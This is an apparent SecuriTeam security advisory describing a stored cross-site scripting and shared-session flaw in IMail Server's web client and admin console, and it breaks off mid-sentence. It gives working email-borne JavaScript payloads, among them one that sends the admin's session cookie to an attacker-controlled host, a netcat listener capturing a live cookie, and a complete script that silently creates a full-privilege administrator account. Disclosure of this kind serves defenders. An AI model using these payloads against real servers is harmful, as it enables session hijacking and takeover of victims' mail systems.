SSD Advisory – IMail Cross Site Scripting

SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries.
Introduction
IMail Server is a Windows Email Server designed specifically for the small-to-medium sized business.
Vulnerability Details
A persistent, unauthenticated, cross site scripting and cross authentication vulnerability in IClient Web interface and IAdmin web interface of IPSwitch allows attackers to execute arbitrary code, which as can be seen below allows the creation of a new user whenever the attack is triggered against the administrator of the system.

Example 1
On the “A” machine we create an email with Javascript code and send it to admin@10.0.8.12, we use this JS in the data of the mail:

<IMG SRC=/ onerror="alert(document.cookie)"></IMG>

We use sendEmail script to send the crafted data, but we can also use Telnet to deliver our XSS code.
Before we send the email, we put the javascript code inside a file (for example: /tmp/test.txt) and then send the mail:
sendEmail -t admin@10.0.8.12 -f cookie@10.0.8.12 -s 10.0.8.12 -u “Cookie” -o message-file=/tmp/test.txt message-content-type=html
When the admin@10.0.8.12 logs in the web client
imail_image_1
and open the email or the preview is activated (by default in iMail server) the script is activated
imail_image_2
Example 2
This is the JS injected via email:

<IMG SRC=/ onerror='document.location.replace("http://10.0.8.11/post.asp?name=victim1&message=" + document.cookie + "<br>" + "URL:" + document.location);'></IMG>

On the “A” machine we start a listener and grab the cookie:

root@bt-CPT:~# nc -lvp 80
listening on [any] 80 ...
192.168.244.130: inverse host lookup failed: Unknown server error : Connection timed out
connect to [10.0.8.11] from (UNKNOWN) [10.0.8.12] 49463
GET /post.asp?name=victim1&message=cookietest=ok;%20IMailCookie=33C97320442B1A76A16472B59CDE9F129B05E1D30EA7C228373113 D7C9A63B227C0E03AB543B265FFC0FAEDC565002262781898AF46F87E5E2EDBF010207A9039AC73B34206434FC16A24B55FC444EBE5BCE357614221297 954D7FD0D140C5715F55ABA50F20351CD59B2A333D0F01E51CCD697F11E00A3B16BF7AD2035480D8814580FFC50E6B72CBBBE7340D32E2A6DF32922DE8 8CA950146FA4D538EDBA4A2AFA469CE079447BFE2A107D0130EA4D;%20iMailUserInfo=e0l%2b9%2fkzxoYE5wrxNaCdHDr4%2bOgpAj7RWNRxVLcHh1A% 3d=3%2bJwUhovTIXvxT%2fe4U%2bjuQ%3d%3d&ixxUbrgcXSqcSaJ9p%2bsBnJ1ISks0ur46BtpG2zJUwx0%3d=3%2bJwUhovTIXvxT%2fe4U%2bjuQ%3d %3d;%20iMailUserLanguage=en-US;%20AdminCulturePref=en-US;%20ReadingPaneVarSize=312<br>URL:http://127.0.0.1/IClient/Pages/Mailbox.aspx?TabId=d4225e22-1798-4d7c-83b2-7f9615ab569a HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Referer: http://127.0.0.1/IClient/Pages/Mailbox.aspx?TabId=d4225e22-1798-4d7c-83b2-7f9615ab569a
Accept-Language: it-IT
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 192.168.244.133
Connection: Keep-Alive

In the next case we will not use the cookie to simply spoof the session, but also try to directly create an administrator user of the Imail Server. This can be done using another projecting issue of Imail server: cross authentication. Imail webclient doesn’t implement a separated session management between the Web IClient (the WEB email client interface) and the web IAdmin (the WEB Imail Server administration interface). So, if an admin is authenticated on the Web IClient is considered authenticated also for the administration web console present on the same web server.
The IAdmin console can be reached both from the IClient or directly pointing to http://IMAILSERVER/IAdmin and share the session with the web IClient.
Example 3
Since the XSS works in the context of the user who activate the script, if the mail is displayed from an admin, I can execute operations in his session using the cross session authentication.
So, the task of my script will be:
 

  • Activate the cross authentication pointing to http://10.0.8.12/IClient/pages/IAdmin.aspx
  • Wait some seconds
  • Execute somepage.aspx + POSTDATA

In this case we will use the createUsers.aspx page in order to create a new user with full privileges.
And here it is the full code that must be sent via email:

<!-- START -->
<!-- Here it is the complete and working script. It creates an admin user called 'Peru' with pass 'asdasd'-->
<!-- This acrivates the cross authentication to Web iAdmin-->
<IMG SRC=/ onerror="
window.open('http://10.0.8.12/IClient/pages/iadmin.aspx');
"></img>
<!-- This will grabs the __VIEWSTATE and the __EVENTVALIDATION from the iframe (the UserCreate.aspx page) at the end of the script.
Then sends the POSTDATA and create the user. A sleep of 5 sec is needed-->
<img src=\ onerror="
setTimeout(function(){
            var divElement = document.getElementById('iframeId').contentWindow.document.getElementById('__VIEWSTATE');
            var divElement1 = document.getElementById('iframeId').contentWindow.document.getElementById('__EVENTVALIDATION');
            var views = divElement.value;
            var event = divElement1.value;
            window.onload = postwith('http://10.0.8.12/IAdmin/imail/UserCreate.aspx',{'__EVENTTARGET':'ctl00$ButtonsPlaceHolder$scbSaveCancel$ctl00', '__VIEWSTATE':views, '__EVENTVALIDATION':event, 'ctl00$ContentPlaceHolder2$txtUserID':'Peru', 'ctl00$ContentPlaceHolder2$txtFullName':'Peru', 'ctl00$ContentPlaceHolder2$txtPassword':'asdasd', 'ctl00$ContentPlaceHolder2$txtConPassword':'asdasd', 'ctl00$ContentPlaceHolder2$drpMaxMailboxSize':'Unlimited', 'ctl00$ContentPlaceHolder2$drpMaxMailBoxSizeUnit':'b', 'ctl00$ContentPlaceHolder2$drpMaxMsgs':'Unlimited', 'ctl00$ContentPlaceHolder2$drpEncoding':'utf-8', 'ctl00$ContentPlaceHolder2$chkEnablePassChange':'on', 'ctl00$ContentPlaceHolder2$chkGrantAccountAccess':'on', 'ctl00$ContentPlaceHolder2$chkAccessInfoServices':'on', 'ctl00$ContentPlaceHolder2$chkAccessLDAPServices':'on', 'ctl00$ContentPlaceHolder2$chkEnableWebCal':'on', 'ctl00$ContentPlaceHolder2$chkEnableIIM':'on', 'ctl00$ContentPlaceHolder2$chkEnableWebAccess':'on', 'ctl00$ContentPlaceHolder2$chkListAdmin':'on', 'ctl00$ContentPlaceHolder2$chkDomAdmin':'on', 'ctl00$ContentPlaceHolder2$chkSysAdmin':'on', 'ctl00$ContentPlaceHolder2$chkEnableRemoteMail':'on'})
            },5000);
function postwith (to,p) {
                  var myForm = document.createElement('form');
                  myForm.method='post' ;
                  myForm.action = to ;
                  for (var k in p) {
                                var myInput = document.createElement('input') ;
                               myInput.setAttribute('name', k) ;
                              myInput.setAttribute('value', p[k]);
                            myForm.appendChild(myInput) ;
                          }
                  document.body.appendChild(myForm) ;
                  myForm.submit() ;
                  document.body.removeChild(myForm) ;
            }
"></img>
<!-- This iframe load the UserCreate.aspx to allow __VIEWSTATE and __EVENTVALIDATION extraction-->
<!-- This iframe must be at the end of the script becouse I used a non closed TAG to bypass control.-->
<iframe src="http://10.0.8.12/IAdmin/imail/UserCreate.aspx" id="iframeId" style="display:none"
<!-- END -->

Note that everything in the POSTDATA can be obtained in a test environment and added to that script.
In this case we add an user, but we can capture in the test environment the POSTDATA of “Deleting a mail domain” and add it to the script.
Also note that some parameters like “__VIEWSTATE” can change in different installations. The above implemented JS is in order to grab the correct _VIEWSTATE, but some browser ask to confirm when loading external content
imail_image_3
In the next image you can see all the exploit:
imail_image_4
from the management console (not the web IAdmin) you can see the presence of only one active user
imail_image_5
the content of the email and the sendEmail script
imail_image_6
the email reach the inbox folder
imail_image_7
when activated the user Peru is created (Firefox 38.0.5).
Note
There are several way to bypass control in the webmail, an XSS input filter was implemented, but only the tag